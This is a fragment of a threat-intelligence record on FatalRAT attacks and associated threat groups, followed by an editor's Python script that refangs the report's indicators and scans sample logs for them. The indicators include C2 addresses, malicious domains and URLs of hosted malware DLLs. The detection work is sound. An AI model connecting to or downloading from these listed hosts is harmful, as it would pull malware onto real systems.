paths\r\nC:\\Users\\fangao\\Desktop\\unrar-tag-6.1.7\\build\\unrardll32\\Release\\UnRAR.pdb\r\nK:\\C++\\梵高远程管理客户端二号\\Release\\FANGAO.pdb\r\nK:\\C++\\梵高远程管理客户端二号\\Release\\BEFORE.pdb\r\nK:\\C++2010\\DLLrun\\DLLrunYoudao\\Release\\DLLrunYoudao.pdb\r\nK:\\C++\\DLL反射注入器四件套二号\\Release\\DLL运行器DLL版(wke.dll).pdb\r\nSystem objects\r\nUniqueMutexName – mutex name\r\nSource: https://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/"
	],
	"report_names": [
		"fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets"
	],
	"threat_actors": [
		{
			"id": "e3492534-85a6-4c87-a754-5ae4a56d7c8c",
			"created_at": "2022-10-25T15:50:23.819113Z",
			"updated_at": "2026-04-10T02:00:05.354598Z",
			"deleted_at": null,
			"main_name": "Threat Group-3390",
			"aliases": [
				"Threat Group-3390",
				"Earth Smilodon",
				"TG-3390",
				"Emissary Panda",
				"BRONZE UNION",
				"APT27",
				"Iron Tiger",
				"LuckyMouse",
				"Linen Typhoon"
			],
			"source_name": "MITRE:Threat Group-3390",
			"tools": [
				"Systeminfo",
				"gsecdump",
				"PlugX",
				"ASPXSpy",
				"Cobalt Strike",
				"Mimikatz",
				"Impacket",
				"gh0st RAT",
				"certutil",
				"China Chopper",
				"HTTPBrowser",
				"Tasklist",
				"netstat",
				"SysUpdate",
				"HyperBro",
				"ZxShell",
				"RCSession",
				"ipconfig",
				"Clambling",
				"pwdump",
				"NBTscan",
				"Pandora",
				"Windows Credential Editor"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "8f68387a-aced-4c99-b2a6-aa85071a0ca3",
			"created_at": "2024-06-25T02:00:05.030976Z",
			"updated_at": "2026-04-10T02:00:03.656871Z",
			"deleted_at": null,
			"main_name": "Void Arachne",
			"aliases": [
				"Silver Fox"
			],
			"source_name": "MISPGALAXY:Void Arachne",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a7805d1a-b8d0-4a42-ae86-1d8711e0b2b9",
			"created_at": "2024-08-28T02:02:09.729503Z",
			"updated_at": "2026-04-10T02:00:04.967533Z",
			"deleted_at": null,
			"main_name": "Void Arachne",
			"aliases": [
				"Silver Fox"
			],
			"source_name": "ETDA:Void Arachne",
			"tools": [
				"Gh0stBins",
				"Gh0stCringe",
				"HoldingHands RAT",
				"Winos"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "55cc5d0d-d268-4f9d-8241-db957c3e02f3",
			"created_at": "2025-03-03T02:02:00.502379Z",
			"updated_at": "2026-04-10T02:00:04.83508Z",
			"deleted_at": null,
			"main_name": "Operation SalmonSlalom",
			"aliases": [],
			"source_name": "ETDA:Operation SalmonSlalom",
			"tools": [
				"FatalRAT",
				"Sainbox RAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "c63ab035-f9f2-4723-959b-97a7b98b5942",
			"created_at": "2023-01-06T13:46:38.298354Z",
			"updated_at": "2026-04-10T02:00:02.917311Z",
			"deleted_at": null,
			"main_name": "APT27",
			"aliases": [
				"BRONZE UNION",
				"Circle Typhoon",
				"Linen Typhoon",
				"TEMP.Hippo",
				"Budworm",
				"Lucky Mouse",
				"G0027",
				"GreedyTaotie",
				"Red Phoenix",
				"Iron Tiger",
				"Iron Taurus",
				"Earth Smilodon",
				"TG-3390",
				"EMISSARY PANDA",
				"Group 35",
				"ZipToken"
			],
			"source_name": "MISPGALAXY:APT27",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b399b5f1-42d3-4b53-8c73-d448fce6ab43",
			"created_at": "2025-08-07T02:03:24.68371Z",
			"updated_at": "2026-04-10T02:00:03.64323Z",
			"deleted_at": null,
			"main_name": "BRONZE UNION",
			"aliases": [
				"APT27 ",
				"Bowser",
				"Budworm ",
				"Circle Typhoon ",
				"Emissary Panda ",
				"Group35",
				"Iron Tiger ",
				"Linen Typhoon ",
				"Lucky Mouse ",
				"TG-3390 ",
				"Temp.Hippo "
			],
			"source_name": "Secureworks:BRONZE UNION",
			"tools": [
				"AbcShell",
				"China Chopper",
				"EAGERBEE",
				"Gh0st RAT",
				"OwaAuth",
				"PhantomNet",
				"PoisonIvy",
				"Sysupdate",
				"Wonknu",
				"Wrapikatz",
				"ZxShell",
				"reGeorg"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775439046,
	"ts_updated_at": 1775792125,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e66c29589f2d77b18611624a8f1f7ac655ab133e.pdf",
		"text": "https://archive.orkl.eu/e66c29589f2d77b18611624a8f1f7ac655ab133e.txt",
		"img": "https://archive.orkl.eu/e66c29589f2d77b18611624a8f1f7ac655ab133e.jpg"
	}
}
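The indicator appendix in the record above is printed in the report's defanged form (`[.]` for dots) and grouped under its own headings (IP addresses, Domain names, URLs of malicious files on legitimate services, Registry keys, File path, System objects). The Python below is an editor's example added here, not code from Kaspersky ICS CERT or from the report: it parses an excerpt of that appendix by those headings, refangs the values, and sweeps a set of constructed log lines for them. Every indicator value is copied from the page; the log lines, their field names (`dst=`, `query=`, `TargetObject=`, `DestinationPort:`, `mutex_created=`), the 10.20.0.0/16 and 203.0.113.0/24 client/destination addresses and the alternate Youdao note ID are assumptions made up for the example. Two details matter for triage and are handled explicitly: the report lists C2s as `ip:port` pairs, so a listed IP seen on a different port is reported separately at lower confidence; and the myqcloud and note.youdao.com hosts are legitimate services, so only the full URL is an indicator, never the host on its own.

```python
import re

# Constructed excerpt of the report's indicator appendix, kept in its defanged
# "[.]" notation. Every value below is taken from the page; the excerpt is not
# the complete list.
IOC_TEXT = """
IP addresses
101.33.243[.]31:82
43.154.238[.]130:6000
43.154.238[.]130:8081
47.57.68[.]157:8080
Domain names
microsoftupdatesoftware[.]ga
101.kkftodesk101[.]top
34.kosdage[.]asia
URLs of malicious files on legitimate services
http://note.youdao[.]com/yws/api/note/4b2eead06fc72ee2763ef1f653cdc4ae
http://11-1318622059.cos.ap-nanjing.myqcloud[.]com/DLL.dll
Registry keys
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SVP7
File path
C:\\ProgramData\\8877
C:\\Windows\\Fatal.key
C:\\ProgramData\\jy.lnk
System objects
UniqueMutexName – mutex name
"""

# The appendix's own section headings, mapped to indicator categories.
SECTIONS = {
    "ip addresses": "ip",
    "domain names": "domain",
    "urls of malicious files on legitimate services": "url",
    "registry keys": "registry",
    "file path": "path",
    "system objects": "mutex",
}

# Registry hive abbreviations as they appear in Sysmon/EDR events, expanded to
# the long form used in the report so the two compare equal.
HIVES = {"hkcu\\": "hkey_current_user\\", "hklm\\": "hkey_local_machine\\"}

IP_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})(?::(\d{1,5}))?")
PORT_RE = re.compile(r"(?:dport|dst_port|destinationport)\W+(\d{1,5})", re.I)
HOST_RE = re.compile(r"\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b", re.I)


def refang(value):
    """Undo the report's defanging so values compare against real log data."""
    return value.replace("[.]", ".").replace("hxxp", "http")


def parse_iocs(text):
    """Split the appendix into {category: set(values)} using its headings."""
    iocs, category = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.lower() in SECTIONS:
            category = SECTIONS[line.lower()]
            continue
        if category is None:
            continue
        value = refang(line)
        if category == "mutex":  # "UniqueMutexName – mutex name" -> name only
            value = re.split(r"\s[\u2013-]\s", value)[0]
        iocs.setdefault(category, set()).add(value)
    return iocs


def norm_reg(s):
    """Lower-case a registry path and expand HKCU/HKLM to the long hive names."""
    s = s.lower()
    for short, full in HIVES.items():
        s = s.replace(short, full)
    return s


def scan(lines, iocs):
    """Return [(line_no, kind, indicator)] for every log line matching an IOC.

    kind "c2"    : exact ip:port pair from the list (high confidence)
    kind "c2_ip" : listed IP seen on another port (lower confidence; the
                   report lists specific ports, so triage before acting)
    Ports are taken from an "ip:port" token or from a dport/DestinationPort
    field on the same line; a line with several IPs and a separate port field
    attributes that port to each IP, which is deliberately conservative.
    """
    ip_ports = iocs.get("ip", set())
    bare_ips = {v.rsplit(":", 1)[0] for v in ip_ports}
    domains = {d.lower() for d in iocs.get("domain", set())}
    urls = iocs.get("url", set())
    reg_keys = iocs.get("registry", set())
    paths = iocs.get("path", set())
    mutexes = iocs.get("mutex", set())
    hits = []
    for n, line in enumerate(lines, 1):
        low = line.lower()
        kv_ports = set(PORT_RE.findall(line))
        for ip, port in IP_RE.findall(line):
            ports = kv_ports | ({port} if port else set())
            exact = {f"{ip}:{p}" for p in ports} & ip_ports
            if exact:
                hits.append((n, "c2", exact.pop()))
            elif ip in bare_ips:
                hits.append((n, "c2_ip", ip))
        for host in HOST_RE.findall(line):
            h = host.lower()
            # exact listed host or a subdomain of one; legitimate CDN/note
            # hosts are not in the domain list, so they never match here
            if h in domains or any(h.endswith("." + d) for d in domains):
                hits.append((n, "domain", h))
        hits += [(n, "url", u) for u in urls if u.lower() in low]
        hits += [(n, "registry", k) for k in reg_keys if norm_reg(k) in norm_reg(line)]
        hits += [(n, "path", p) for p in paths if p.lower() in low]
        hits += [(n, "mutex", m) for m in mutexes if m in line]
    return hits


# Constructed log lines for the example (firewall, DNS, Sysmon-style, proxy,
# sandbox); none of them come from the report.
SAMPLE_LOGS = [
    "2025-02-20T08:11:02Z fw01 action=allow src=10.20.5.17:51234 dst=43.154.238.130:6000 proto=tcp",
    "2025-02-20T08:11:05Z dns01 client=10.20.5.17 query=101.kkftodesk101.top type=A",
    "2025-02-20T08:11:09Z sysmon EventID=13 Image=C:\\ProgramData\\8877\\a.exe "
    "TargetObject=HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SVP7",
    "2025-02-20T08:11:11Z proxy client=10.20.5.17 url=http://11-1318622059.cos.ap-nanjing.myqcloud.com/DLL.dll status=200",
    "2025-02-20T08:11:12Z proxy client=10.20.5.22 url=http://note.youdao.com/yws/api/note/ffffffffffffffffffffffffffffffff status=200",
    "2025-02-20T08:12:40Z sysmon EventID=3 Image=C:\\Windows\\explorer.exe DestinationIp: 43.154.238.130 DestinationPort: 443",
    "2025-02-20T08:13:00Z sysmon EventID=11 TargetFilename=C:\\Windows\\Fatal.key",
    "2025-02-20T08:13:05Z sandbox01 mutex_created=UniqueMutexName pid=4412",
    "2025-02-20T08:14:00Z fw01 action=allow src=10.20.5.17:51301 dst=203.0.113.10:443 proto=tcp",
]

if __name__ == "__main__":
    for n, kind, value in scan(SAMPLE_LOGS, parse_iocs(IOC_TEXT)):
        print(f"line {n}: {kind:8} {value}")
```

Run stand-alone it reports eight hits: the exact C2 pair on line 1, the kkftodesk domain on line 2, the SVP7 Run key and the ProgramData\8877 path on line 3, the myqcloud URL on line 4, the listed IP on an unlisted port (443) on line 6 as `c2_ip`, the Fatal.key path on line 7 and the mutex on line 8. Line 5 (a different Youdao note on the legitimate host) and line 9 (an unrelated destination) produce nothing, which is the intended behaviour: the host alone is not evidence.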